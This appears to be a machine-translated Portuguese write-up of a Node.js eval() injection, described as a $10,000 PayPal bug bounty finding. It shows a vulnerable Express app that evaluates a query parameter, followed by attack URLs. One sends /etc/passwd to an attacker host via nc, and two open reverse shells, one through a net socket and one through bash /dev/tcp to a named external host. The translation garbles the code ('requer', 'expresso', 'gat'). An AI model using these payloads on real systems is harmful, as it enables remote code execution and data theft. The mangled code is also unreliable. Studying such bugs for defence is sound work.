fundo
@Artsploit Ao cavar para o PayPal, constatou que um código NodeJS foi executado, recompensando US $ 10.000.
teste
var express = requer ('expresso'); var app = express (); App.get ('/', function (req, res) {res.send ('Hello eval (req.query.q)); console.log (req.query.q);}); App.Listen (8080, function () {console.log (' Exemplo ouvindo na porta 8080! ');});Leia qualquer arquivo
http: // host: 8080/? q = requer ('child_process') .exec ('gat+/etc/passwd+|+nc+atacante+80')Obtenha shell
http: // host: 8080/? q = var+net+=+requer ("net"),+sh+=+requer ("child_process") .exec ("/bin/bash"); var+cliente+=+new+net.sock et (); client.connect (80,+"atacante",+function () {client.pipe (sh.stdin); sh.stdout.pipe (client); sh.stderr.pipe (client);});Obtenha shell2
http: // host: 8080/? q = requer ("Child_Process") .exec ('Bash -c "Bash -i>%26 /dev/tcp/wufeiEi.com/7890 0>%261"')